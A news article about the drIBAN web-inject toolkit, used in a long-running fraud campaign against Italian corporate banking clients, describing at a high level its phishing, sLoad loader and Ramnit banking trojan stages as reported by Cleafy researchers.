Posted on May 6, 2023 at 6:31 AM
Hackers use a new web-inject toolkit to target Italian corporate banking clients
Hackers have targeted Italian corporate banking clients in an ongoing financial fraud campaign. The campaign has leveraged a new web-inject toolkit known as drIBAN since at least 2019. This toolkit has been used to launch the campaign targeting the financial industry, which poses a significant threat.
Hackers target Italian corporate banking clients in an ongoing financial fraud campaign
According to Cleafy cybersecurity researchers Federico Valentini and Alessandro Strino, the main objective behind this hacking campaign was to infect the Windows workstations within corporate environments. They also attempted to change the beneficiary of the target clients and transfer funds to illegitimate bank accounts.
“The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account,” the cybersecurity researchers said.
The Italian cybersecurity company has also said that the bank accounts to which the funds were transferred were owned by the hackers or their affiliates. These other parties were tasked with laundering the stolen funds.
The hackers used an old strategy of web injects. The strategy is time-tested, enabling malware to deploy custom scripts on the client side using a man-in-the-browser attack. The hacker later intercepts the traffic coming to and from the server.
The fraudulent transactions done by these hackers are enabled by a technique known as Automated Transfer System (ATS). The ATS system can bypass the anti-fraud systems established by financial institutions like banks. The hackers late initiate unauthorized wire transfers from a computer owned by a victim.
The operators behind the drIBAN web inject toolkit have become savvier over the years. These hackers have been avoiding detection and creating effective social engineering strategies. The threat actors have also established a strong foothold over their clientele base. Their attacks usually last for long periods, with their primary target being corporate bank networks.
The hacking campaign has been ongoing for years
According to a report published by Cleafy, the operations of the classic “banking trojan” started to evolve in 2021. The banking trojan operation evolved into an advanced persistent threat at the time. Other indications also show that the activity cluster overlaps with a campaign conducted in 2018.
The 2018 campaign was attributed to a threat actor known as TA554. This threat actor was tracked by Proofpoint researchers, with data showing that they targeted users based in Canada, Italy, and the United Kingdom.
The attack chain the threat actors use commences with a certified email, also known as a PEC email. The goal behind the attack is for the threat actors to lure victims and cheat them of having a false sense of security.
The phishing emails sent by the threat actors contain an executable file. The file is a downloader for malware known as sLoad or Starslord loader. sLoad is a PowerShell loader that has the potential to collect data from the victim.
sLoad is a reconnaissance tool that can gather and exfiltrate information from a compromised host. The goal behind sLoad is to assess the target and later deploy a more significant payload such as Ramnit. This payload is deployed if the target is classified as profitable, and the hackers can accrue financial benefits from them.
Cleafy further said that the enrichment phase could continue for days or weeks. The number of infected machines determined the duration of the phase. The additional data stolen from the victims will be exfiltrated to the hackers, making it easier for the botnet to become more robust and consistent in handling the exploit.
The sLoad PowerShell loader also uses living-off-the-land (LotL) techniques by exploiting legitimate Windows tools such as PowerShell and BITSAdmin. These techniques are used as part of the evasion mechanisms by the hackers.
The other feature of this malware is that it can counter-check against a pre-determined list of corporate banks and determine if a workstation that has been hacked is one of the targets. If the institution is a target, the malware will proceed with the infection.
The researchers further said that the botnet operators would choose the bots that passed these steps and be seen as “new candidates” for banking fraud operations. After being singled out, the Ramnit banking trojan will be deployed and installed on the user’s devices.